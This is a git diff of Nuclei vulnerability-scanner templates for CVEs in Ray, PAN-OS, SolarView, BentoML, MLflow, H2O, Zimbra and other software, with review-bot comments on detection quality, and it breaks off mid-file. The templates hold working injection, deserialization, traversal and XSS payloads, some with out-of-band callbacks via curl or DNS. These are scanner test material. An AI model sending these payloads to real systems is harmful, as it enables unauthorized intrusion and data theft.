+ metadata: + max-request: 1 + tags: zimbra,kev + +http: + - method: GET + path: + - "{{BaseURL}}/js/zimbraMail/share/model/ZmSettings.js" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Zimbra Collaboration Suite Web Client" + + - type: word + part: header + words: + - "application/x-javascript" + + - type: word + words: + - "8.8" + - "8.8.6" + - "8.8.7" + - "8.8.8" + - "8.8.9" + - "8.8.10" + - "8.8.11" + - "8.8.12" + - "8.8.13" + - "8.8.14" + part: version + + - type: regex + regex: + - "8.8.15p[12]" + + extractors: + - type: regex + part: body + group: 1 + regex: - 'CLIENT_VERSION\", {type:ZmSetting.T_CONFIG, defaultValue:\"(.*?)"' \ No newline at end of file diff --git a/poc/cve/CVE-2022-26159.yaml b/poc/cve/CVE-2022-26159.yaml index 41d6be2d94..08705eb77a 100644 --- a/poc/cve/CVE-2022-26159.yaml +++ b/poc/cve/CVE-2022-26159.yaml 
@@ -5,17 +5,28 @@ info: author: Remi Gascou (podalirius) severity: medium description: Ametys CMS before 4.5.0 allows a remote unauthenticated attacker to read documents such as plugins/web/service/search/auto-completion/domain/en.xml (and similar pathnames for other languages) via the auto-completion plugin, which contain all characters typed by all users, including the content of private pages. For example, a private page may contain usernames, e-mail addresses, and possibly passwords. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the information disclosure vulnerability in Ametys CMS. reference: - https://nvd.nist.gov/vuln/detail/CVE-2022-26159 - https://podalirius.net/en/cves/2022-26159/ - https://issues.ametys.org/browse/CMS-10973 + - https://github.com/p0dalirius/CVE-2022-26159-Ametys-Autocompletion-XML/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2022-26159 + cwe-id: CWE-425 + epss-score: 0.00597 + epss-percentile: 0.75972 + cpe: cpe:2.3:a:ametys:ametys:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: ametys + product: ametys tags: cve,cve2022,plugin,ametys,cms -requests: +http: - method: GET path: - '{{BaseURL}}/plugins/web/service/search/auto-completion/domain/en.xml?q=adm' @@ -37,4 +48,4 @@ requests: status: - 200 -# Enhanced by mp on 2022/03/23 +# digest: 4a0a0047304502203ae18ae0788ec7bba9ff7655f021e591d4738f30ebc268792ba8cad5511b62fc022100fb29e7d8ae023df0fdf98dd1918e899657007c99aa84a9ce14c6ac2d5f93e00b:922c64590222798bb761d5b6d8e72950 diff --git a/poc/cve/CVE-2022-28363.yaml b/poc/cve/CVE-2022-28363.yaml index 46534e84f1..ffbcf1a3b7 100644 --- a/poc/cve/CVE-2022-28363.yaml +++ b/poc/cve/CVE-2022-28363.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Reprise License Manager 14.2 contains a reflected cross-site scripting vulnerability in the /goform/login_process 'username' parameter via GET, whereby no authentication is required. + remediation: | + Upgrade to a patched version of Reprise License Manager or apply the vendor-supplied patch to mitigate this vulnerability. reference: - https://www.reprisesoftware.com/products/software-license-management.php - https://github.com/advisories/GHSA-rpvc-qgrm-r54f @@ -16,19 +18,22 @@ info: cvss-score: 6.1 cve-id: CVE-2022-28363 cwe-id: CWE-79 + epss-score: 0.00237 + epss-percentile: 0.61655 + cpe: cpe:2.3:a:reprisesoftware:reprise_license_manager:14.2:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: reprisesoftware + product: reprise_license_manager tags: xss,rlm,packetstorm,cve,cve2022 -requests: +http: - method: GET path: - "{{BaseURL}}/goform/login_process?username=test%22%3E%3Csvg/onload=alert(document.domain)%3E" matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word part: body words: @@ -41,4 +46,8 @@ requests: words: - "text/html" -# Enhanced by mp on 2022/09/14 + - type: status + status: + - 200 + +# digest: 4a0a00473045022100e9721c06d4b0e767eabf044318a9e04e5fe294864011b3f0a6081c9e0ab4889b0220124b28e0005f4ac4ee9c00928495eca980eaba0cd0cdb8d1f26c98073c902e73:922c64590222798bb761d5b6d8e72950 diff --git a/poc/cve/CVE-2022-41352.yaml b/poc/cve/CVE-2022-41352.yaml index 38de5d87eb..a5e3541e3f 100644 --- a/poc/cve/CVE-2022-41352.yaml +++ b/poc/cve/CVE-2022-41352.yaml 
@@ -1,40 +1,40 @@ -id: CVE-2022-41352 - -info: - name: Zimbra Improper Encoding or Escaping of Output - author: rxerium - severity: critical - description: An issue was discovered in the Calendar feature in Zimbra Collaboration Suite 8.8.x before 8.8.15 patch 30 (update 1), as exploited in the wild starting in December 2021. An attacker could place HTML containing executable JavaScript inside element attributes. This markup becomes unescaped, causing arbitrary markup to be injected into the document. - metadata: - max-request: 1 - tags: zimbra,kev - -http: - - method: GET - path: - - "{{BaseURL}}/js/zimbraMail/share/model/ZmSettings.js" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "Zimbra Collaboration Suite Web Client" - - - type: word - part: header - words: - - "application/x-javascript" - - - type: word - words: - - "8.8.15" - - "9.0" - part: version - - extractors: - - type: regex - part: body - group: 1 - regex: +id: CVE-2022-41352 + +info: + name: Zimbra Improper Encoding or Escaping of Output + author: rxerium + severity: critical + description: An issue was discovered in the Calendar feature in Zimbra Collaboration Suite 8.8.x before 8.8.15 patch 30 (update 1), as exploited in the wild starting in December 2021. An attacker could place HTML containing executable JavaScript inside element attributes. This markup becomes unescaped, causing arbitrary markup to be injected into the document. 
+ metadata: + max-request: 1 + tags: zimbra,kev + +http: + - method: GET + path: + - "{{BaseURL}}/js/zimbraMail/share/model/ZmSettings.js" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Zimbra Collaboration Suite Web Client" + + - type: word + part: header + words: + - "application/x-javascript" + + - type: word + words: + - "8.8.15" + - "9.0" + part: version + + extractors: + - type: regex + part: body + group: 1 + regex: - 'CLIENT_VERSION\", {type:ZmSetting.T_CONFIG, defaultValue:\"(.*?)"' \ No newline at end of file diff --git a/poc/cve/CVE-2023-6016.yaml b/poc/cve/CVE-2023-6016.yaml index a7c7c083cf..688203d048 100644 --- a/poc/cve/CVE-2023-6016.yaml +++ b/poc/cve/CVE-2023-6016.yaml 
@@ -1,50 +1,50 @@ -id: CVE-2023-6016 - -info: - name: H2O(v3.42.0.2) RCE via POJO Model import - author: VulnSphere - severity: critical - description: RCE in H2O dashboard by (ab)using it's POJO Model import feature - reference: - - https://huntr.com/bounties/83dd17ec-053e-453c-befb-7d6736bf1836/ - classification: - cvss-score: 10 - cve-id: CVE-2023-6018 - cwe-id: CWE-78 - tags: h2o-3,h2o,cve,ml,huntr - -http: - - raw: - - | - POST /3/ModelBuilders/generic/parameters HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - model_id=generic-68510df2-f19a-4871-8285-9321a7ef6d51 - - - | - POST /3/ModelBuilders/generic/parameters HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - model_id=generic-68510df2-f19a-4871-8285-9321a7ef6d51&path=http%3A%2F%2F93{{interactsh-url}} - - - | - POST /3/ModelBuilders/generic/parameters HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - model_id=generic-68510df2-f19a-4871-8285-9321a7ef6d51&path=http%3A%2F%2F93{{interactsh-url}} - - - | - POST /3/ModelBuilders/generic HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - model_id=generic-68510df2-f19a-4871-8285-9321a7ef6d51&path=http%3A%2F%2F93{{interactsh-url}} - - matchers: - - type: word - part: interactsh_protocol # Confirms http Interaction - words: +id: CVE-2023-6016 + +info: + name: H2O(v3.42.0.2) RCE via POJO Model import + author: VulnSphere + severity: critical + description: RCE in H2O dashboard by (ab)using it's POJO Model import feature + reference: + - https://huntr.com/bounties/83dd17ec-053e-453c-befb-7d6736bf1836/ + classification: + cvss-score: 10 + cve-id: CVE-2023-6018 + cwe-id: CWE-78 + tags: h2o-3,h2o,cve,ml,huntr + +http: + - raw: + - | + POST /3/ModelBuilders/generic/parameters HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + model_id=generic-68510df2-f19a-4871-8285-9321a7ef6d51 + + - | + POST 
/3/ModelBuilders/generic/parameters HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + model_id=generic-68510df2-f19a-4871-8285-9321a7ef6d51&path=http%3A%2F%2F93{{interactsh-url}} + + - | + POST /3/ModelBuilders/generic/parameters HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + model_id=generic-68510df2-f19a-4871-8285-9321a7ef6d51&path=http%3A%2F%2F93{{interactsh-url}} + + - | + POST /3/ModelBuilders/generic HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + model_id=generic-68510df2-f19a-4871-8285-9321a7ef6d51&path=http%3A%2F%2F93{{interactsh-url}} + + matchers: + - type: word + part: interactsh_protocol # Confirms http Interaction + words: - "http" \ No newline at end of file diff --git a/poc/cve/CVE-2023-6019.yaml b/poc/cve/CVE-2023-6019.yaml index 3ad1e8b2c6..0d2a0e2368 100644 --- a/poc/cve/CVE-2023-6019.yaml +++ b/poc/cve/CVE-2023-6019.yaml 
@@ -1,44 +1,44 @@ -id: CVE-2023-6019 - -info: - name: Ray(v2.6.3) cpu_profile command injection - author: VulnSphere - severity: critical - description: Ray command injection via the cpu_profile API endpoint allowing os command execution on the Ray dashboard host - reference: - - https://huntr.com/bounties/d0290f3c-b302-4161-89f2-c13bb28b4cfe/ - classification: - cvss-score: 10 - cve-id: CVE-2023-6019 - cwe-id: CWE-78 - tags: ray,ml,cve,huntr - -variables: - python_payload: "python3 -c 'import socket;socket.gethostbyname(\"{{interactsh-url}}\")'" - -http: - - method: GET - path: - - "{{BaseURL}}/nodes?view=summary" - - "{{BaseURL}}/worker/cpu_profile?pid={{pid}}&ip={{node_ip}}&duration=5&native=0&format=%60echo%20{{base64(python_payload)}}|base64$IFS-d|sh%60" - - matchers: - - type: word - part: interactsh_protocol # Confirms DNS Interaction - words: - - "dns" - - extractors: - - type: json - part: body - internal: true - name: pid - json: - - '..|objects|.pid//empty[0]' - - - type: json - part: body - internal: true - name: node_ip - json: +id: CVE-2023-6019 + +info: + name: Ray(v2.6.3) cpu_profile command injection + author: VulnSphere + severity: critical + description: Ray command injection via the cpu_profile API endpoint allowing os command execution on the Ray dashboard host + reference: + - https://huntr.com/bounties/d0290f3c-b302-4161-89f2-c13bb28b4cfe/ + classification: + cvss-score: 10 + cve-id: CVE-2023-6019 + cwe-id: CWE-78 + tags: ray,ml,cve,huntr + +variables: + python_payload: "python3 -c 'import socket;socket.gethostbyname(\"{{interactsh-url}}\")'" + +http: + - method: GET + path: + - "{{BaseURL}}/nodes?view=summary" + - "{{BaseURL}}/worker/cpu_profile?pid={{pid}}&ip={{node_ip}}&duration=5&native=0&format=%60echo%20{{base64(python_payload)}}|base64$IFS-d|sh%60" + + matchers: + - type: word + part: interactsh_protocol # Confirms DNS Interaction + words: + - "dns" + + extractors: + - type: json + part: body + internal: true + name: pid + json: + - 
'..|objects|.pid//empty[0]' + + - type: json + part: body + internal: true + name: node_ip + json: - '..|objects|.ip//empty[0]' \ No newline at end of file diff --git a/poc/cve/CVE-2023-6975.yaml b/poc/cve/CVE-2023-6975.yaml index 4e5def40cb..6467b70616 100644 --- a/poc/cve/CVE-2023-6975.yaml +++ b/poc/cve/CVE-2023-6975.yaml 
@@ -1,41 +1,41 @@ -id: CVE-2023-6975 -info: - name: MLflow(v2.7.1) FTP Path Traversal - author: VulnSphere - severity: high - description: An issue in MLflow's handling of FTP URLs allows for path traversal, enabling attackers to write files to arbitrary locations on the server. - reference: https://huntr.com/bounties/029a3824-cee3-4cf1-b260-7138aa539b85/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N - cvss-score: 9.3 - cve-id: CVE-2023-6975 - cwe-id: CWE-29 - tags: mlflow,ml,cve,path-traversal - -variables: - experiment_name: "{{rand_text_alpha(6)}}" - -http: - - raw: - - | - POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json - - {"name": "{{experiment_name}}"} - - | - POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json - - {"name": "{{experiment_name}}", "source": "ftp://{{interactsh-url}}/a"} - - | - GET /model-versions/get-artifact?path=random&name={{experiment_name}}&version=1 HTTP/1.1 - Host: {{Hostname}} - - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol - words: +id: CVE-2023-6975 +info: + name: MLflow(v2.7.1) FTP Path Traversal + author: VulnSphere + severity: high + description: An issue in MLflow's handling of FTP URLs allows for path traversal, enabling attackers to write files to arbitrary locations on the server. 
+ reference: https://huntr.com/bounties/029a3824-cee3-4cf1-b260-7138aa539b85/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N + cvss-score: 9.3 + cve-id: CVE-2023-6975 + cwe-id: CWE-29 + tags: mlflow,ml,cve,path-traversal + +variables: + experiment_name: "{{rand_text_alpha(6)}}" + +http: + - raw: + - | + POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"name": "{{experiment_name}}"} + - | + POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"name": "{{experiment_name}}", "source": "ftp://{{interactsh-url}}/a"} + - | + GET /model-versions/get-artifact?path=random&name={{experiment_name}}&version=1 HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: - "dns" \ No newline at end of file diff --git a/poc/cve/CVE-2024-2912.yaml b/poc/cve/CVE-2024-2912.yaml index 2003a19916..9b4d4d35cd 100644 --- a/poc/cve/CVE-2024-2912.yaml +++ b/poc/cve/CVE-2024-2912.yaml 
@@ -1,30 +1,30 @@ -id: CVE-2024-2912 - -info: - name: BentoML(v1.2.2) Insecure Deserialization RCE Simulation - author: VulnSphere - severity: critical - description: Simulates an insecure deserialization attack on BentoML to trigger remote code execution. Binary data is string "protectai" pickled. - reference: - - https://huntr.com/bounties/349a1cce-6bb5-4345-82a5-bf7041b65a68 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cwe-id: CWE-1188 # Insecure Default Initialization of Resource - cve-id: CVE-2024-2912 - tags: bentoml, rce, deserialization, huntr, ai, machine-learning,cve,cve2024 - -requests: - - method: POST - path: - - "{{BaseURL}}/summarize" - headers: - Content-Type: "application/vnd.bentoml+pickle" - body: !!binary | - gASVJAAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjAlwcm90ZWN0YWmUhZRSlC4= - matchers-condition: and - matchers: - - type: word - words: - - "Input should be a valid dictionary or instance of Input" +id: CVE-2024-2912 + +info: + name: BentoML(v1.2.2) Insecure Deserialization RCE Simulation + author: VulnSphere + severity: critical + description: Simulates an insecure deserialization attack on BentoML to trigger remote code execution. Binary data is string "protectai" pickled. + reference: + - https://huntr.com/bounties/349a1cce-6bb5-4345-82a5-bf7041b65a68 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cwe-id: CWE-1188 # Insecure Default Initialization of Resource + cve-id: CVE-2024-2912 + tags: bentoml, rce, deserialization, huntr, ai, machine-learning,cve,cve2024 + +requests: + - method: POST + path: + - "{{BaseURL}}/summarize" + headers: + Content-Type: "application/vnd.bentoml+pickle" + body: !!binary | + gASVJAAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjAlwcm90ZWN0YWmUhZRSlC4= + matchers-condition: and + matchers: + - type: word + words: + - "Input should be a valid dictionary or instance of Input" part: body \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-5550.yaml b/poc/cve/CVE-2024-5550.yaml index ab4ab7379b..a70f7dda79 100644 --- a/poc/cve/CVE-2024-5550.yaml +++ b/poc/cve/CVE-2024-5550.yaml @@ -1,31 +1,31 @@ -id: CVE-2024-5550 - -info: - name: H2O(v3.40.0.4) arbitrary path lookup - author: VulnSphere - severity: medium - description: H2O allows for arbitrary path lookup via it's Typehead API endpoint - reference: - - https://huntr.com/bounties/e76372c2-39be-4984-a7c8-7048a75a25dc/ - classification: - cwe-id: CWE-200 - tags: h2o-3,h2o,ml,huntr,protectai - -http: - - raw: - - | - GET /3/Typeahead/files?src=%2F&limit=10 HTTP/1.1 - Host: {{Hostname}} - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: body - words: - - "/bin" - - "/boot" +id: CVE-2024-5550 + +info: + name: H2O(v3.40.0.4) arbitrary path lookup + author: VulnSphere + severity: medium + description: H2O allows for arbitrary path lookup via it's Typehead API endpoint + reference: + - https://huntr.com/bounties/e76372c2-39be-4984-a7c8-7048a75a25dc/ + classification: + cwe-id: CWE-200 + tags: h2o-3,h2o,ml,huntr,protectai + +http: + - raw: + - | + GET /3/Typeahead/files?src=%2F&limit=10 HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - "/bin" + - "/boot" - "/sbin" \ No newline at end of file diff --git a/poc/cve/cve-2020-8115.yaml b/poc/cve/cve-2020-8115.yaml index aecdd7b672..b404c7d217 100644 --- a/poc/cve/cve-2020-8115.yaml +++ b/poc/cve/cve-2020-8115.yaml 
@@ -1,20 +1,9 @@ -id: CVE-2020-8115 +id: cve-2020-8115 info: name: Revive Adserver XSS - author: madrobot,dwisiswant0 + author: madrobot & dwisiswant0 severity: medium - description: | - A reflected XSS vulnerability has been discovered in the publicly accessible afr.php delivery script of Revive Adserver <= 5.0.3 by Jacopo Tediosi. There are currently no known exploits: the session identifier cannot be accessed as it is stored in an http-only cookie as of v3.2.2. On older versions, however, under specific circumstances, it could be possible to steal the session identifier and gain access to the admin interface. The query string sent to the www/delivery/afr.php script was printed back without proper escaping in a JavaScript context, allowing an attacker to execute arbitrary JS code on the browser of the victim. - reference: - - https://hackerone.com/reports/775693 - - https://www.revive-adserver.com/security/revive-sa-2020-001/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2020-8115 - cwe-id: CWE-79 - tags: cve,cve2020,xss requests: - method: GET diff --git a/poc/cve/cve-2021-44152.yaml b/poc/cve/cve-2021-44152.yaml index 65f8cd6545..53cfd2061f 100644 --- a/poc/cve/cve-2021-44152.yaml +++ b/poc/cve/cve-2021-44152.yaml 
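Review bot: The new `info` block for this template has no `tags` and no `classification`, so tag-based, CVE-based and CVSS-based selection can no longer pick it up, and a finding carries no description or reference for triage. The id also changes to lowercase `cve-2020-8115`, while the next file in this patch moves the other way, to `id: CVE-2021-44152`, so one casing should be used throughout. I would keep `id: CVE-2020-8115`, `tags: cve,cve2020,xss` and the removed `classification` block with `cve-id: CVE-2020-8115` and `cwe-id: CWE-79`. The `requests` body continues outside the hunk and is not reviewed here.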
@@ -1,20 +1,25 @@ -id: unauth-rlm +id: CVE-2021-44152 info: name: Reprise License Manager 14.2 - Authentication Bypass author: Akincibor severity: critical - description: Reprise License Manager (RLM) 14.2 does not verify authentication or authorization and allows unauthenticated users to change the password of any existing user. + description: | + Reprise License Manager (RLM) 14.2 does not verify authentication or authorization and allows unauthenticated users to change the password of any existing user. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-44152 - https://reprisesoftware.com/admin/rlm-admin-download.php?&euagree=yes - http://packetstormsecurity.com/files/165186/Reprise-License-Manager-14.2-Unauthenticated-Password-Change.html + - https://nvd.nist.gov/vuln/detail/CVE-2021-44152 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-44152 cwe-id: CWE-287 - tags: unauth,rlm + metadata: + verified: true + shodan-query: http.html:"Reprise License Manager" + google-dork: inurl:"/goforms/menu" + tags: cve2021,rlm,auth-bypass,packetstorm,cve requests: - method: GET @@ -23,13 +28,13 @@ requests: matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word part: body words: - "RLM Administration Commands" + - type: status + status: + - 200 + # Enhanced by mp on 2022/06/03 diff --git a/poc/cve/cve-2022-29303.yaml b/poc/cve/cve-2022-29303.yaml index 3f9b0f07ff..1d2c392e54 100644 --- a/poc/cve/cve-2022-29303.yaml +++ b/poc/cve/cve-2022-29303.yaml 
@@ -6,35 +6,24 @@ info: severity: critical description: | SolarView Compact 6.00 was discovered to contain a command injection vulnerability via conf_mail.php. - impact: | - Successful exploitation of this vulnerability can lead to unauthorized remote code execution, potentially compromising the confidentiality, integrity, and availability of the system. - remediation: | - Apply the latest patch or update provided by the vendor to fix the OS command injection vulnerability in SolarView Compact 6.00. reference: - https://www.exploit-db.com/exploits/50940 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29303 - https://drive.google.com/drive/folders/1tGr-WExbpfvhRg31XCoaZOFLWyt3r60g?usp=sharing - - http://packetstormsecurity.com/files/167183/SolarView-Compact-6.0-Command-Injection.html - - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-29303 - cwe-id: CWE-78 - epss-score: 0.9598 - epss-percentile: 0.99429 - cpe: cpe:2.3:o:contec:sv-cpt-mc310_firmware:6.00:*:*:*:*:*:*:* + cwe-id: CWE-77 metadata: - verified: true - max-request: 1 - vendor: contec - product: sv-cpt-mc310_firmware shodan-query: http.html:"SolarView Compact" - tags: cve,cve2022,injection,solarview,edb,packetstorm,rce,kev,contec + verified: "true" + tags: cve,cve2022,rce,injection,solarview,edb + variables: cmd: "cat${IFS}/etc/passwd" -http: +requests: - raw: - | @timeout: 25s @@ -44,15 +33,10 @@ http: mail_address=%3B{{cmd}}%3B&button=%83%81%81%5B%83%8B%91%97%90M - matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0" - - type: word - part: body - words: - - "p1_network_mail.cgi" -# digest: 4a0a00473045022100cfdae160b8d20debb49ab77a03efc5984e3595e0738b0153de27449eb8cf254c022008bf10a1ac0f9b524841d022daae36b4b0b105ddae1296e300fb87c886200617:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# Enhanced by mp on 2022/06/01 
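Review bot: In the second hunk, removing `matchers-condition: and` together with the `p1_network_mail.cgi` word matcher leaves `root:.*:0:0` as the only condition. Any response body that contains a passwd-style line now counts as a hit, whether or not it came from the SolarView mail page, so false positives become more likely. I would keep `matchers-condition: and` and the `- type: word` matcher on `p1_network_mail.cgi`. In the first hunk, `verified: "true"` is a quoted string where CVE-2021-44152 in this patch uses the boolean `verified: true`. The move from `CWE-78` to `CWE-77` also looks like a step back for what the description calls command injection through conf_mail.php.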
diff --git a/poc/cve/cve-2024-3400.yaml b/poc/cve/cve-2024-3400.yaml
index cb640767ec..a9d651ea8b 100644
--- a/poc/cve/cve-2024-3400.yaml
+++ b/poc/cve/cve-2024-3400.yaml
@@ -1,65 +1,60 @@ -id: cve-2024-3400 +id: CVE-2024-3400 info: - name: Palo Alto GlobalProtect Command Injection - author: hexa - severity: high - description: Detects command injection vulnerability CVE-2024-3400 in Palo Alto GlobalProtect VPN. + name: GlobalProtect - OS Command Injection + author: salts,parthmalhotra + severity: critical + description: | + A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability. + reference: + - https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-CVE-2024-3400/ + - https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis + - https://nvd.nist.gov/vuln/detail/CVE-2024-3400 + - https://github.com/zam89/CVE-2024-3400-pot + - https://github.com/ZephrFish/CVE-2024-3400-Canary + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cve-id: CVE-2024-3400 + cwe-id: CWE-20,CWE-77 + epss-score: 0.95703 + epss-percentile: 0.99417 + cpe: cpe:2.3:o:paloaltonetworks:pan-os:10.2.0:-:*:*:*:*:*:* + metadata: + verified: true + max-request: 3 + vendor: paloaltonetworks + product: "pan-os" + shodan-query: + - "http.favicon.hash:-631559155" + - http.favicon.hash:"-631559155" + - cpe:"cpe:2.3:o:paloaltonetworks:pan-os" + fofa-query: "icon_hash=\"-631559155\"" + tags: cve,cve2024,globalprotect,pan-os,rce,oast,kev,intrusive,paloaltonetworks -requests: - - method: POST - path: - - "{{BaseURL}}/ssl-vpn/hipreport.esp" - headers: - User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" - Content-Type: "application/x-www-form-urlencoded" - Cookie: 
"SESSID=../../../var/appweb/sslvpndocs/global-protect/portal/images/{{Filename}}" - matchers: - - type: status - status: - - 200 - extractors: - - type: regex - name: file_content - regex: - - ".*" - payloads: - filename: - - "exploitCheck.exp" +http: + - raw: + - | + GET /global-protect/portal/images/{{randstr}}.txt HTTP/1.1 HTTP/1.1 + Host: {{Hostname}} + - | + POST /ssl-vpn/hipreport.esp HTTP/1.1 + Host: {{Hostname}} + Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/{{randstr}}.txt; + Content-Type: application/x-www-form-urlencoded - - method: GET - path: - - "{{BaseURL}}/global-protect/portal/images/{{Filename}}" - headers: - User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" - matchers: - - type: status - status: - - 403 - extractors: - - type: regex - name: vuln_check - regex: - - "403" + user=global&portal=global&authcookie=e51140e4-4ee3-4ced-9373-96160d68&domain=global&computer=global&client-ip=global&client-ipv6=global&md5-sum=global&gwHipReportCheck=global + - | + GET /global-protect/portal/images/{{randstr}}.txt HTTP/1.1 HTTP/1.1 + Host: {{Hostname}} + + # Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}{{interactsh-url}}`; payload for rce, requires cronjob to be executed to run command - - method: POST - path: - - "{{BaseURL}}/ssl-vpn/hipreport.esp" - headers: - User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" - Content-Type: "application/x-www-form-urlencoded" - Cookie: "SESSID=../../../../opt/panlogs/tmp/device_telemetry/minute/attack782`{{CallbackURL}}?r=$({{Payload}})`" + matchers-condition: and matchers: - - type: word - words: - - "Success" - payloads: - payload: - - "whoami" - - "id" - - "pwd" - extractors: - - type: regex - name: cmd_exec - regex: - - "Success" + - type: dsl + dsl: + - status_code_1 == 404 && status_code_3 == 
403 + - contains(body_2, 'invalid required input parameters') + condition: and +# digest: 4a0a00473045022100aea1f0b3bf8fcbf9b028775de7eee9c1f158aad09cea1518a4ac483b00268ffd02205db7564fb596e8ada469884d750e9125102b47ee3826d62a03e40fbd09bf9ea2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/exploit-cve-2022-1388.yaml b/poc/cve/exploit-cve-2022-1388.yaml index 62a06938bc..fb5afb9aac 100644 --- a/poc/cve/exploit-cve-2022-1388.yaml +++ b/poc/cve/exploit-cve-2022-1388.yaml 
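Review bot: The first and third raw requests end their request line with `HTTP/1.1 HTTP/1.1`, which is malformed. Depending on how the raw-request parser and any proxy in front of the target treat the extra token, the response may be a 400, and then `status_code_1 == 404 && status_code_3 == 403` can never hold, so a vulnerable host would go unreported. Both lines should read `GET /global-protect/portal/images/{{randstr}}.txt HTTP/1.1`. The commented-out cookie line under the third request describes a command-execution variant that the matchers never use, so I would drop it from a detection template. `shodan-query` also lists the same favicon hash twice in different quoting.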
@@ -1,57 +1,37 @@ +--- id: CVE-2022-1388 info: - name: F5 BIG-IP iControl REST Auth Bypass RCE | Command Parameter - author: Mrcl0wn - severity: critical - description: "CVE-2022-1388 is an authentication bypass vulnerability in the REST \ncomponent of BIG-IP’s iControl API that was assigned a CVSSv3 \nscore of 9.8. The iControl REST API is used for the management and \nconfiguration of BIG-IP devices. CVE-2022-1388 could be exploited \nby an unauthenticated attacker with network access to the management \nport or self IP addresses of devices that use BIG-IP. Exploitation would \nallow the attacker to execute arbitrary system commands, create and \ndelete files and disable services.\n" - reference: - - https://github.com/alt3kx/CVE-2022-1388_PoC - - https://support.f5.com/csp/article/K23605346 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388 - - https://github.com/dorkerdevil/CVE-2021-22986-Poc/blob/main/README.md - - https://github.com/horizon3ai/CVE-2022-1388/blob/main/CVE-2022-1388.py - - https://www.tenable.com/blog/cve-2022-1388-authentication-bypass-in-f5-big-ip - - https://github.com/numanturle/CVE-2022-1388/blob/main/bigip-icontrol-rest-rce.yaml - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2022-1388 - cwe-id: CWE-306 - metadata: - shodan-query: http.title:"BIG-IP®-+Redirect" +"Server" - verified: true - tags: bigip,mirai,rce,cve,cve2022 -variables: - auth_var: "admin:" - cmd_var: "{{CMD}}" + name: bigip + author: secthebit + 